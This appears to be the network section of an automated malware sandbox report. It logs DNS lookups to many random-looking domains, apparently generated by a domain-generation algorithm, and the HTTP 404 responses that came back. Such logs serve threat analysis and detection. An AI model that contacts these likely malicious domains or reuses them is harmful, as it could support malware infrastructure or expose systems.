Source: global traffic	DNS traffic detected: DNS query: gadyveb.com
Source: global traffic	DNS traffic detected: DNS query: lymytux.com
Source: global traffic	DNS traffic detected: DNS query: volyjok.com
Source: global traffic	DNS traffic detected: DNS query: pumytup.com
Source: global traffic	DNS traffic detected: DNS query: galyhiw.com
Source: global traffic	DNS traffic detected: DNS query: lysyvan.com
Source: global traffic	DNS traffic detected: DNS query: vonyryc.com
Source: global traffic	DNS traffic detected: DNS query: qekyhil.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:42:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBj5aZVI65kyZDJ%2FFidXbhtn%2B962u%2BE4mvm4If5SGmgioNP3sS2S7XBhsBaCfCOsppletHJ1sKxNw8sEVkSsmqJo3Qhg4UA%2F%2FHLNAmXINOGvKtg4SyrVksPbHLtgUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c8e02b871c34b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:42:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7JRfeBUh1WIiC1qA5SYFt9n%2BNc867fRUr5wP1ixM6lidfKI3uUWb9WzlaPXKVwcvqHinp3o3gY%2BAjsp0kLy%2F6M7W0fIO8FrWQTbeVwCYpSx7eqGYyBg%2FBbq5xiu1fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c8e16b95242f8-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:43:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="30.7",amp_style_sanitizer;dur="14.1",amp_tag_and_attribute_sanitizer;dur="11.3",amp_optimizer;dur="16.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fs93R2NJP0o49EZuEgS3Ac38A9igF3GzJv%2B%2F7RfX%2Fn%2Bk4pnM7zYqlIdQvTinumMZRBXb2urxf93CHe84r9AwbiyUy4DFSHpRnV7eygSlbhmJP7D71DouRWzGQXezUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c8f288e754346-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:43:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0K0qMHJ06ql1CRX%2BJoo6v9MRttnzEL9yWM39K4UkHuiknRYNMTfVRtUkWMpEQ8N3C%2FKteR%2FHUcU7cYPIyyWyn9%2Fjs98en5iznJTwOtUxNXUVjJN3mVrRejEVd5GDA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c8ffbc816434a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:43:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klYq6YYmcRMdbilfj26HsgXXG677Rd1h8HQd8LJL853e1aKKqyV6LuJPeXHQHUgx%2BDxhC96l05lY0x0g%2Fns99PKzV8bY%2F%2B%2B%2Be%2Bdv1wwzSBPZUng0cCtrtmBfw6hTLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c90064ab6c44a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:43:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="45.7",amp_style_sanitizer;dur="20.2",amp_tag_and_attribute_sanitizer;dur="20.0",amp_optimizer;dur="24.9"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFlMBxJLc8%2FWBJ4nGdrEiwyjv3lm6z0Q0SMzfchV%2FanIcY01r%2BWxbgspeJSkXmxmbqhsSoe4%2BhKnbInsD%2BuRXLxv7M%2FxMVYiheSIHbWtMvqtUaAOiuaj4VdAa8q%2Fiw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c90497805438a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="60.4",amp_style_sanitizer;dur="25.0",amp_tag_and_attribute_sanitizer;dur="28.8",amp_optimizer;dur="27.3"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tece5BWV8IkYRy59M7RuAxejrceWuYYZ1Hi%2BTV2i4%2FVCwx3UmpAbW4PHfjr8zX4%2B5RHUEWCJlKQ1jqj3NjOtljicf3Hk2jviyb2WxLlxajy0t%2BE6iewf%2Bhzu%2BZExA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c905ed8f67ce2-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:42:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:42:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:42:14 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:42:14 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:42:29 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:42:30 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 32 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:43:07 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
